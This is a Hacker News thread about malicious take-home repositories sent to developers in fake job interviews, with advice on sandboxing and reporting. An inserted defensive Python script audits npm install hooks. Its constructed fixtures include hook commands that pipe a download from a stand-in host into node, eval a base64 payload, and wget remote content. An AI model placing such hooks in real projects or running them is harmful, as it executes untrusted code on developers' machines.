82 points by signa11 10 hours ago | 8 comments
  • sneakerblack 3 hours ago
    This all stinks of Lazarus:

    https://en.wikipedia.org/wiki/Lazarus_Group

    I've done incident responses for this exact type of attack multiple times. They've gotten much better organized lately and will often contact developers directly (over LinkedIn or WhatsApp) to run this type of attack. (Although, usually pretending to run a test for a job interview -- which is maybe why the author was confused about the code)

    • krisbolton an hour ago
      100%. I can't find it now, but someone last month posted a similar story on HN. The threat actor had stolen someone's GitHub account and altered their otherwise legitimate looking repo. They'll expend a lot of effort in order to masquerade and trick you. TraderTraitor is another good DPRK example.

      Anyone reading - if you're ever a victim, worth reporting to your national CERT and your org. The CERT can provide advice, it's useful for their threat intel, and your org can check their systems. You might not be the end target.

  • ThreatSystems 6 hours ago
    I run training courses on developer security to broaden their understanding of threat surface from their behaviour, day-to-day tooling, the repositories they work on and broader supply chain. One of the modules covers this exact scenario, it's amazing how many people do these exercises on corporate machines let alone their personal device!

    There are mitigations you can put in place by using containers, virtual machines or even the execution environment e.g. Deno's ability to block/whitelist network calls[0], Bun's --ignore-scripts [1] and supply chain package managers have made some strides here like pnpm [2]. But it's knowing your threat surface and how to use your tooling which can be quite overbearing on cognitive load, especially in fast paced scenarios like "job of a lifetime offer!" from LinkedIn.

    Easiest way by default is to use ephemeral VMs / Sandbox Containers for such tasks which don't have mounted directories to your system etc. Or spin up a cheap EC2 / VPS to work on them in a short period of time.

    [0] - https://deno.com/blog/deno-protects-npm-exploits and https://docs.deno.com/runtime/fundamentals/security/

    [1] - https://bun.com/docs/pm/lifecycle

    [2] - https://pnpm.io/supply-chain-security

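One concrete pre-flight check that fits the mitigations above: before running anything in a "take-home" repo, list the npm lifecycle hooks it declares, because those are exactly the commands an unguarded `npm install` runs and exactly what `--ignore-scripts` suppresses. This is an added example, not code from the thread or from Deno, Bun or pnpm; it assumes the repo is already cloned locally, and the package.json contents it audits are constructed for the demo.

```python
"""Audit a cloned repo for npm lifecycle hooks before running anything in it.

Added example (not code from the thread or any project named in it). It assumes
the repo is already checked out locally; the package.json content below is
constructed for the demo. Lifecycle hooks are what --ignore-scripts blocks, so
this lists the commands an unguarded `npm install` would execute.
"""
import json
import os
import re
import tempfile

# Scripts that npm/yarn/pnpm run automatically during install or packing.
LIFECYCLE_HOOKS = {
    "preinstall", "install", "postinstall",
    "prepare", "prepublish", "prepublishOnly", "prepack", "postpack",
}

# Constructed heuristics: traits that are common in hostile install hooks.
SUSPICIOUS = [
    (r"\b(curl|wget)\b", "fetches remote content at install time"),
    (r"\bnode\s+-e\b", "evaluates inline JavaScript at install time"),
    (r"\bnode\s+\S+\.c?js\b", "runs a repo-local script at install time"),
    (r"base64|atob\(", "carries an encoded payload"),
    (r"child_process|execSync|spawn\(", "spawns a subprocess"),
]


def find_manifests(root):
    """Yield every package.json under root, skipping vendored node_modules."""
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = sorted(d for d in dirnames if d != "node_modules")
        if "package.json" in filenames:
            yield os.path.join(dirpath, "package.json")


def audit_manifest(root, path):
    """Return one finding per lifecycle hook declared in one package.json."""
    with open(path, encoding="utf-8") as fh:
        manifest = json.load(fh)
    findings = []
    for name, command in sorted((manifest.get("scripts") or {}).items()):
        if name in LIFECYCLE_HOOKS:
            reasons = [why for pattern, why in SUSPICIOUS if re.search(pattern, command)]
            findings.append({
                "file": os.path.relpath(path, root),
                "hook": name,
                "command": command,
                "reasons": reasons,
            })
    return findings


def audit_repo(root):
    """Audit every manifest in the tree; deterministic order for reporting."""
    findings = []
    for manifest_path in find_manifests(root):
        findings.extend(audit_manifest(root, manifest_path))
    return sorted(findings, key=lambda f: (f["file"], f["hook"]))


# Constructed sample repo: a monorepo-style layout with one vendored package
# (which the walker must skip) and hooks of varying suspiciousness.
SAMPLE_REPO = {
    "package.json": {
        "name": "take-home-assignment",
        "scripts": {
            "test": "jest",
            "postinstall": "node scripts/setup.js",
            "prepare": "curl -s https://example.invalid/bootstrap | node",
        },
    },
    "packages/ui/package.json": {
        "name": "ui",
        "scripts": {
            "build": "tsc",
            "preinstall": "node -e \"eval(Buffer.from(process.env.PAYLOAD, 'base64').toString())\"",
        },
    },
    "node_modules/vendored/package.json": {
        "name": "vendored",
        "scripts": {"postinstall": "wget https://example.invalid/x"},
    },
}


def demo():
    """Write the constructed repo to a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, manifest in SAMPLE_REPO.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                json.dump(manifest, fh)
        return audit_repo(root)


if __name__ == "__main__":
    for finding in demo():
        flags = ", ".join(finding["reasons"]) or "no heuristic match"
        print(f"{finding['file']}: {finding['hook']}: {finding['command']!r} [{flags}]")
```

Run it against a real checkout by replacing `demo()` with `audit_repo("/path/to/clone")`. Note what this does and does not cover: it enumerates install-time hooks, which is the vector `--ignore-scripts` closes, but code that runs when you later type `npm start` or `npm test` is not an install hook and will not appear here, which is the reason the post above still recommends an ephemeral VM or container with no host directories mounted.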

  • tptacek 7 hours ago
    I snagged right away at "the kind of low-level reliability judgment that most teams only notice when something breaks." Real people don't talk like the J. Peterman catalog.
    • close04 2 hours ago
      At this point it’s safe to assume most articles get the AI touch-up because the authors think that polish is worth it.

      But what’s worse is the millionth “haw haw, it was made with AI” comment. Use your expertise to tell us if the article’s analysis is any good, not if the author used a “fancy narration” filter. “AI detectors” are a dime a dozen.

      • isaachh 2 hours ago
        That's a quote from the attacker, not part of the article itself. I don't think they are suggesting the article was AI written.
  • Muromec 5 hours ago
    I had an email like that last week, where sender claimed to be from Singapore, but the company and the person were not searchable on the blue site and their interview scheduling link didn't match Singapore timezone, while the domain was registered through an Indian registrar. The email didn't sound right somehow.

    I almost scheduled a call with them and even self-explained that of course they would be on Pacific time, it's where the money is.

    I do have some npm packages under my name and they found me through github, so here is that.

  • bobkb 6 hours ago
    This type of attack has been going on for a few years now. I have 2 to my credit.

    Some details https://freebird.in/malicious-code-source-code-shared-via-jo...

  • bstsb 4 hours ago
    wow, this is actually a really impressive attack - a far cry from the obfuscated postinstall hooks seen a million times before.

    the only real long-term solution to node-based attacks like this is to run any remote code in a container, or even a VM?

  • timfsu 8 hours ago
    Wow, this is pretty scary. LLMs have made phishing attempts look so much more legit, and the damage they can do so much greater.
  • nesarkvechnep 8 hours ago
    [flagged]
    • OsrsNeedsf2P 6 hours ago
      I found them refreshing and hacker vibes. I understand that's not welcome on HN though
    • ggm 7 hours ago
      Blame post modernism.